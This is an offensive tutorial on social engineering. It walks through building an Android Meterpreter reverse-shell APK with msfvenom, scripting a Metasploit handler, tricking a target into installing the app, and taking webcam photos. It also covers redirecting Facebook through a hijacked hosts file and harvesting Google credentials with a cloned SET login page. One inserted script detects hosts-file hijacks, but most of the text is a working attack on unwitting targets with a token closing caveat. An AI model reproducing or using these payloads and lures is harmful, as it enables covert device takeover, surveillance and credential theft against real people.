Today I am going to teach the various ways you can use social engineering to get into a system. If you have followed my past tutorials, you know that social engineering unlocks a world of possibilities: no matter how many firewalls sit in front of a server, and no matter how well it is patched, the password lives in someone's head, and people are far easier to fool than computers.
As I say in all of my social engineering tutorials, the secret is simple: convince the other person that you have more authority than they do, and that they should trust you with their private information. Usually that means pretending to be someone you're not.
Social engineering has existed for as long as people have. It shows up throughout history, most famously in the Trojan horse, which is now the name for malware that disguises itself as something you want. In the next step we are going to look at the different ways we can get information from people.
The goal of any social engineering attack is to get you access to information you are not authorized to have. Below is a list of ways we can get information from a target:
- Convince the target to download a "virus" (really a backdoor)
Convincing a target to install a backdoored app gives us access to their entire device. From there we can turn on the webcam, read their messages, start a keylogger and much more. This method has a serious flaw, though: if the target, or their antivirus, spots the payload, we could be in big trouble.
- Convince the target to log in to a fake website (phishing)
Convincing the target to log in to a fake website, also known as "phishing", is an easy way to get a target's password. The hardest part is getting the target to log in at all. Unlike installing an app, a target will most likely notice that the URL is not the real one and refuse. There are ways around this, however. Editing the target's hosts file lets us hijack name resolution: the hosts file maps names to IP addresses, so an entry pointing www.facebook.com at our server's IP means that when the target types www.facebook.com, the browser connects to our phishing page while the address bar still shows facebook.com. Two catches: we need physical (or existing remote) access to the machine to edit the file, and because the real site uses HTTPS, the browser will show a certificate warning when our server cannot present a valid certificate for facebook.com.
- Convince the target that we are their boss
This method is typically used against companies. I went into detail on it in my past tutorial, "How To Use Social Engineering to Find Out More Information About A Company". It involves calling the target and convincing them that we are calling from the corporate office. If you are convincing enough, you can tell them to do almost anything. It's pretty funny actually.
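The hosts-file trick from the phishing item above, seen from the defender's side. This is an added example and not code from the original tutorial: it parses a hosts file and reports every name that has been pointed somewhere other than loopback, which is exactly what a hijacked entry for www.facebook.com looks like. It assumes a POSIX shell with awk; the hosts entries are constructed for the example and 192.0.2.10 is a documentation address, not a real attacker.

```shell
#!/bin/sh
# Constructed sample: a hosts file as an attacker with physical access
# might leave it. 192.0.2.10 is a documentation address (RFC 5737).
HOSTS_SAMPLE=$(cat <<'EOF'
127.0.0.1   localhost
::1         localhost ip6-localhost
# added by someone who "fixed" the computer
192.0.2.10  www.facebook.com facebook.com
192.0.2.10  accounts.google.com
10.0.0.5    printer.lan  # a legitimate entry the owner added
EOF
)

# Print "ADDRESS NAME" for every hosts entry that maps a name to something
# other than a loopback address. On a normal workstation this list is empty
# or contains only names you added yourself.
find_hijacks() {
    # $1 = hosts file content
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }   # comments, blanks
        $1 == "127.0.0.1" || $1 == "::1" { next }      # loopback is normal
        {
            for (i = 2; i <= NF; i++) {
                if ($i ~ /^#/) break                   # inline comment
                print $1, $i
            }
        }
    '
}

# Exit 0 if the given hostname resolves through the hosts file to a
# non-loopback address (i.e. it has been hijacked), 1 otherwise.
is_hijacked() {
    # $1 = hosts file content, $2 = hostname to check
    printf '%s\n' "$1" | awk -v host="$2" '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
        $1 != "127.0.0.1" && $1 != "::1" {
            for (i = 2; i <= NF; i++) {
                if ($i ~ /^#/) break
                if ($i == host) found = 1
            }
        }
        END { if (found) exit 0; exit 1 }
    '
}

find_hijacks "$HOSTS_SAMPLE"
```

On a live machine, run the same check against /etc/hosts (C:\Windows\System32\drivers\etc\hosts on Windows) or ask the resolver directly with `getent hosts www.facebook.com`; an answer that is not one of Facebook's own addresses is the tell. From the victim's side the other tell is the certificate warning: a phishing server cannot get a certificate for facebook.com, so an HTTPS redirect through the hosts file never looks clean.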
In the next few steps we will go into more detail on phishing and payloads. We will be using Kali Linux, but if you don't have Kali, make sure you have Metasploit and the Social-Engineer Toolkit (SET) installed.
Now is where we get technical. For this tutorial we will build a simple backdoored app to deploy on our target's Android phone. We will assume you are on the same network as the target; if you are not, the phone still has to be able to reach your listener, so look up port forwarding in another tutorial first.
First let's start the Metasploit services. On the Kali release this tutorial was written for, that is two commands. The first is:
service postgresql start
And the second command is:
service metasploit start
On current Kali there is no metasploit service any more; run msfdb init the first time (and msfdb start afterwards), which starts PostgreSQL and sets up Metasploit's database for you.
Once the services are running, we can build the payload: an Android app that, when opened, connects back to our computer on port 8080 and opens a Meterpreter session. With the tool this tutorial used, type:
msfpayload android/meterpreter/reverse_tcp LHOST=(your ip address) LPORT=8080 R > /root/Desktop/coolapp.apk
msfpayload was removed from Metasploit in 2015, so on a current install the equivalent command is:
msfvenom -p android/meterpreter/reverse_tcp LHOST=(your ip address) LPORT=8080 -o /root/Desktop/coolapp.apk
Either way, LHOST is the IP address of your machine as the phone sees it, and LPORT must match the port the handler listens on below.
Now we should have a payload on the desktop called "coolapp.apk". Next we need a handler that catches the connection and opens the Meterpreter session in our terminal. Open the Metasploit console by typing:
msfconsole
Wait until the console opens. When it does, type the following, in this order (the first line selects the generic handler module; without it the set commands have nothing to apply to):
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost (your ip address)
set lport 8080
Once you have typed all these commands in this order, you should be ready to exploit. Now the rest is social engineering. Tell your target that you have found a really cool app that will show a picture of a customized diamond if you answer enough cool questions. Make something up, have a little fun. Once you convince them to download your app, send them the coolapp.apk that you created on the desktop. Do not close the terminal yet. When they have the app and are ready to open it, type:
exploit
This starts the listener, and when the target opens the app you should get a Meterpreter session. From here you can type the following commands:
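The payload and handler steps above, scripted for a current Metasploit install. This is an added example and not code from the original tutorial: it writes the handler commands to a msfconsole resource script (so they are not retyped by hand each time), sanity-checks that script, and builds the APK with msfvenom if it is installed. The placeholder address 192.0.2.10 and the output paths under /tmp are assumptions for this example; LHOST must be your own machine's address as the phone sees it.

```shell
#!/bin/sh
# Added example: scripts the payload + handler setup from the tutorial.
# LHOST/LPORT/OUT_APK/HANDLER_RC are placeholders; override via environment.
LHOST="${LHOST:-192.0.2.10}"          # documentation address, change it
LPORT="${LPORT:-8080}"
PAYLOAD="android/meterpreter/reverse_tcp"
OUT_APK="${OUT_APK:-/tmp/coolapp.apk}"
HANDLER_RC="${HANDLER_RC:-/tmp/handler.rc}"

# Write a msfconsole resource script with the same handler commands the
# tutorial types interactively. "exploit -j" plus ExitOnSession=false keeps
# the listener running, so a second phone or a reconnect is still caught.
write_handler_rc() {
    # $1 output path, $2 payload, $3 LHOST, $4 LPORT
    cat > "$1" <<EOF
use exploit/multi/handler
set PAYLOAD $2
set LHOST $3
set LPORT $4
set ExitOnSession false
exploit -j
EOF
}

# Sanity-check a resource script before handing it to msfconsole: the right
# module and payload are selected and the port is a number in range.
check_handler_rc() {
    # $1 path, $2 expected payload
    grep -q '^use exploit/multi/handler$' "$1" || return 1
    grep -q "^set PAYLOAD $2\$" "$1" || return 1
    port=$(sed -n 's/^set LPORT //p' "$1")
    [ "$port" -ge 1 ] 2>/dev/null && [ "$port" -le 65535 ] 2>/dev/null
}

# Build the APK. msfpayload was removed from Metasploit in 2015; msfvenom is
# its replacement. Returns 2 when msfvenom is not installed so the caller
# can tell "not built on this machine" from "build failed".
build_apk() {
    # $1 output path, $2 payload, $3 LHOST, $4 LPORT
    command -v msfvenom >/dev/null 2>&1 || return 2
    msfvenom -p "$2" LHOST="$3" LPORT="$4" -o "$1"
}

write_handler_rc "$HANDLER_RC" "$PAYLOAD" "$LHOST" "$LPORT"
if check_handler_rc "$HANDLER_RC" "$PAYLOAD"; then
    echo "handler script written to $HANDLER_RC"
fi
if build_apk "$OUT_APK" "$PAYLOAD" "$LHOST" "$LPORT"; then
    echo "payload written to $OUT_APK"
elif [ $? -eq 2 ]; then
    echo "msfvenom not found; skipping the APK build"
else
    echo "msfvenom failed" >&2
fi
# Start the listener with:  msfconsole -q -r "$HANDLER_RC"
```

Run it, then start the listener with `msfconsole -q -r /tmp/handler.rc` before the target opens the app. The LHOST and LPORT baked into the APK and the ones in the resource script come from the same variables, which removes the most common reason a session never arrives: a payload and a handler that disagree about where to connect.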
webcam_list
This command lists the device's cameras in numeric order.
webcam_snap -i (camera number)
This command takes a picture with the target's camera. On Android, camera number 1 takes the picture with the rear camera and 2 with the front camera.
help
This displays the rest of the commands and what they do. For the sake of this tutorial I will let you explore the rest on your own.
In the next step we will discuss phishing with the Social Engineering Toolkit.
Phishing with Kali Linux is much easier to set up. For simplicity, we will clone a Google login page that our target will visit and enter their credentials into. First open a terminal and type:
setoolkit
This command opens the Social-Engineer Toolkit menu.
SET is menu-driven: you type a number to proceed to the next step. The numbers we will type, in this order, are:
1, 2, 3, 1
That is: 1) Social-Engineering Attacks, 2) Website Attack Vectors, 3) Credential Harvester Attack Method, 1) Web Templates. Menu numbers shift between SET versions, so read the labels rather than trusting the digits.
Now it should ask what IP address to use for the harvester (the address the cloned page will POST credentials back to). This should be your local IP. To find it, open a new terminal and type:
ifconfig
This displays your IP address (on newer systems use ip addr instead). Copy the address, paste it back into SET and hit enter. Now it will ask which template you want: choose 2 for Google and hit enter, and the harvester starts. If SET complains about Apache, hit Ctrl-C, set APACHE_SERVER=OFF in SET's config file (set.config; where it lives depends on your SET version) and start again. Now convince your target to visit your local IP, either by hiding it behind a URL shortener (Google's goo.gl no longer accepts new links, so use another) or just by telling him or her that your super duper awesome website uses Google to connect people. Keep in mind that the harvester serves plain HTTP from a bare IP address; a careful target will notice both.
So you have learned about social engineering and how it relates to computers. From here I hope you raise your guard against people who offer you websites and apps, and make sure you never download anything from a source you can't verify. Thanks, and as always, comment if you have any concerns! :D